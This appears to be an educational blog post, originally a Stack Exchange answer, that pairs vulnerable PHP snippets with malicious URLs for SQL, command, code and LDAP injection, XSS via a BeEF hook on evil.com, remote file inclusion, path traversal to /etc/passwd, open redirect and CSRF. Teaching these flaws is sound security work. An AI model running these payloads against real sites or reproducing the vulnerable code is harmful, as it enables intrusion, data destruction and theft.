Hacks that work just by changing the URL

Hacks that work just by changing the URL

  • One legit and one malicious example
  • Some examples require URL encoding to work (usually done automatically by browser)

SQL Injection

code:
$username = $_POST['username'];
$pw = $_GET['password'];
mysql_query("SELECT * FROM userTable WHERE username = $username AND password = $pw");
exploit (logs in as administrator without knowing password):
example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
example.com/?username=Administrator&password=password' or 1=1--

Cross Site Scripting (XSS)

If you are curious about XSS, see my article ‘Guide in understanding XSS – XSS payloads, attack vectors, BeEF hooking, MiTM with Shank and some history

code:
$nickname= $_GET['nickname'];
echo "Your nickname is $nickname\n";
exploit (registrers visiting user as a zombie in BeEF):
example.com/?nickname=Karrax 
example.com/?nickname=<script src="evil.com/beefmagic.js.php" />

Remote code execution

code:
include($_GET["module"].".php");
exploit (downloads and runs arbitrary code) :
example.com/?module=frontpage 
example.com/?module=pastebin.com/mymaliciousscript

Command injection

code:
echo shell_exec('cat '.$_GET['filename']);
exploit (tries to delete all files from root directory):
 example.com/?filename=readme.txt 
example.com/?filename=readme.txt;rm -r /

Code injection

code:
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
exploit (injects phpinfo() command which prints very usefull attack info on screen):
 example.com/?arg=1 
example.com/?arg=1; phpinfo()

LDAP injection

code:
$username = $_GET['username'];
$password = $_GET['password'];
ldap_query("(&(cn=$username)(password=$password)")
exploit (logs in without knowing admin password):
example.com/?username=admin&password=adminadmin 
example.com/?username=admin&password=*

Path traversal

code:
include("./" . $_GET['page']);
exploit (fetches /etc/passwd):
 example.com/?page=front.php 
example.com/?page=../../../../../../../../etc/passwd

Redirect/Forward attack

code:
$redirectUrl = $_GET['url'];
header("Location: $redirectUrl");
exploit (Sends user from your page to evil page) :
example.com/?url=example.com/faq.php 
example.com/?url=evil.com/sploitCode.php

Failure to Restrict URL Access

code:

N/A. Lacking .htaccess ACL or similar access control. Allows user to guess or by other
means discover the location of content that should only be accessible while logged in.

exploit:
example.com/users/showUser.php 
example.com/admins/editUser.php

Cross-Site Request Forgery

code:

N/A. Code lacks page to page secret to validate that request comes from current site.
Implement a secret that is transmitted and validated between pages.

exploit:
Legal submit: example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
On evil page: img src="http://example.com/app/transferFunds?amount=1500 destinationAccount=evilAccount#" width="0" height="0"

Buffer overflow (technically by accessing an URL, but implemented with metasploit)

code:

N/A. Vulnerability in the webserver code itself. Standard buffer overflow

Exploit:

http://www.exploit-db.com/exploits/16798/

 

[important]This was my answer for a question at security.stackexchange.com and currently the highest voted answer in the community and the first to go over 100 votes. The post can be found here.[/important]